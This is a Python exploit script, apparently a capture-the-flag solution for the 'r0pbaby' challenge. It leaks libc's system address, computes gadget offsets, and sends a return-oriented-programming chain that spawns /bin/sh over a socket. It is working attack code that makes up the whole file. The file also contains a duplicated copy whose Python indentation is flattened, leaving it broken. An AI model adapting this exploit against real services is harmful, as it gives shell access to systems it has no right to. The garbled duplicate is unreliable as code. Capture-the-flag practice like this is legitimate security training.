eboda/ropbaby.py

## ropbaby.py
#!/usr/bin/env python

import sys
import socket
import struct
import telnetlib
import time
import re
import string


#s = socket.create_connection(("r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me", 10436))
s = socket.create_connection(("127.0.0.1", 13337))


def interact():
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()


def ra(to=.5):
    buf = ""
    s.setblocking(0)
    begin = time.time()
    while 1:
        if buf is not "" and time.time() - begin > to:
            break
        elif time.time() - begin > to*2:
            break
        try:
            data = s.recv(4096)
            if data:
                begin = time.time()
                buf += data
            else:
                time.sleep(.1)
        except:
            pass

    s.setblocking(1)
    return buf


def rt(delim):
    buf = ""
    while delim not in buf:
        buf += s.recv(1)
    return buf


def se(data):
    s.sendall(data)

def u32(d):
    return struct.unpack("<I", d)[0]

def u64(d):
    return struct.unpack("<Q",d)[0]


def p32(d):
    return struct.pack("<I", d)


def p64(d):
    return struct.pack("<Q", d)

def rstr(l):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(l))

def pwn():
    se("2\n")
    se("system\n")

    rt("system: ")
    ans = rt("\n")[:-1]
    system  = int(ans,16)
    base = system - 0x46640

    bin_sh_string = base + 0x17ccdb

    print "[+] libc @ " , hex(base)

    pop_rdi = base + 0x22b1a


    rop_chain = "A"*8 + p64(pop_rdi) + p64(bin_sh_string) + p64(system)
    # or really simpler with the "one shot"-shell:
    # rop_chain = "A"*8 + p64(base + 0xe681d)


    se("3\n")
    se(str(len(rop_chain)) + "\n")
    se(rop_chain  + "\n")

    ra()
    print "[+] shell: "
    interact()


pwn()
	#!/usr/bin/env python

	import sys
	import socket
	import struct
	import telnetlib
	import time
	import re
	import string


	#s = socket.create_connection(("r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me", 10436))
	s = socket.create_connection(("127.0.0.1", 13337))


	def interact():
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()


	def ra(to=.5):
	buf = ""
	s.setblocking(0)
	begin = time.time()
	while 1:
	if buf is not "" and time.time() - begin > to:
	break
	elif time.time() - begin > to*2:
	break
	try:
	data = s.recv(4096)
	if data:
	begin = time.time()
	buf += data
	else:
	time.sleep(.1)
	except:
	pass

	s.setblocking(1)
	return buf


	def rt(delim):
	buf = ""
	while delim not in buf:
	buf += s.recv(1)
	return buf


	def se(data):
	s.sendall(data)

	def u32(d):
	return struct.unpack("<I", d)[0]

	def u64(d):
	return struct.unpack("<Q",d)[0]


	def p32(d):
	return struct.pack("<I", d)


	def p64(d):
	return struct.pack("<Q", d)

	def rstr(l):
	return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(l))

	def pwn():
	se("2\n")
	se("system\n")

	rt("system: ")
	ans = rt("\n")[:-1]
	system = int(ans,16)
	base = system - 0x46640

	bin_sh_string = base + 0x17ccdb

	print "[+] libc @ " , hex(base)

	pop_rdi = base + 0x22b1a


	rop_chain = "A"*8 + p64(pop_rdi) + p64(bin_sh_string) + p64(system)
	# or really simpler with the "one shot"-shell:
	# rop_chain = "A"*8 + p64(base + 0xe681d)


	se("3\n")
	se(str(len(rop_chain)) + "\n")
	se(rop_chain + "\n")

	ra()
	print "[+] shell: "
	interact()


	pwn()